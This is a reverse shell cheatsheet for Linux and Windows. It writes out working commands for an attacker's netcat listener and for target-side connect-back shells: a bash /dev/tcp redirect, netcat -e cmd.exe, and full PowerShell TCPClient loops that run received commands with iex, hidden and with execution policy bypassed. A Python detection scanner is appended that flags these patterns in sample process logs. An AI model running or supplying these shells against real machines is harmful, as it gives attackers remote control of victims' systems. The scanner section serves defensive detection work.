Reverse Shell Cheatsheet

A reverse shell allows an attacker to gain shell access to a target machine by making the target connect back to the attacker's listener. Below are common reverse shell commands for Linux and Windows.

Attacker's Machine (Listener)

Start a listener to wait for incoming connections:

nc -nvlp {port}

Linux Reverse Shell (Target)

On the target machine, connect back to the attacker's listener:

bash -i >& /dev/tcp/{ip}/{port} 0>&1

Windows Reverse Shell (Target)

  • Using netcat:
nc.exe -nv 192.168.119.1 443 -e cmd.exe
\\192.168.119.1\a\bin\nc.exe -nv 192.168.119.1 443 -e cmd.exe
  • Using PowerShell (full):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("192.168.119.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • Using PowerShell (short):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
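As an added detection-side example, not part of this cheatsheet: a small Python scanner that flags the reverse-shell patterns listed above (bash /dev/tcp redirection, netcat with -e, PowerShell TCPClient plus iex) in process command-line records. The records, hosts and the `host|user|cmdline` line format are constructed assumptions for the demo.

```python
import re
from typing import Dict, List

# Indicators derived from the commands on this page. Each regex names one technique.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\S+/\d+"),
    "netcat_exec": re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+\S*(?:sh|cmd\.exe)", re.IGNORECASE),
    "powershell_tcpclient": re.compile(r"System\.Net\.Sockets\.TCPClient", re.IGNORECASE),
    # iex/Invoke-Expression fed from a socket stream, in either order on the line
    "powershell_iex_stream": re.compile(
        r"\b(?:iex|Invoke-Expression)\b.*GetStream|GetStream.*\b(?:iex|Invoke-Expression)\b",
        re.IGNORECASE,
    ),
}


def scan_command_line(cmdline: str) -> List[str]:
    """Return the names of every indicator that matches one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan 'host|user|cmdline' records (assumed format); return one finding per hit line."""
    findings = []
    for line in lines:
        host, user, cmdline = line.split("|", 2)  # maxsplit=2 keeps pipes inside cmdline intact
        hits = scan_command_line(cmdline)
        if hits:
            findings.append({"host": host, "user": user, "indicators": hits, "cmdline": cmdline})
    return findings


# Constructed sample process-creation records (not real telemetry); 10.0.0.5 is a made-up address.
SAMPLE_LOG = [
    "web01|www-data|bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "web01|root|nc -nvlp 8080",
    "ws07|alice|nc.exe -nv 10.0.0.5 443 -e cmd.exe",
    "ws07|alice|powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\"",
    "db02|postgres|pg_dump -U postgres app > /backup/app.sql",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']} {f['user']}: {', '.join(f['indicators'])}")
```

The plain listener (`nc -nvlp`) and the backup job produce no finding; only the three connect-back command lines are reported.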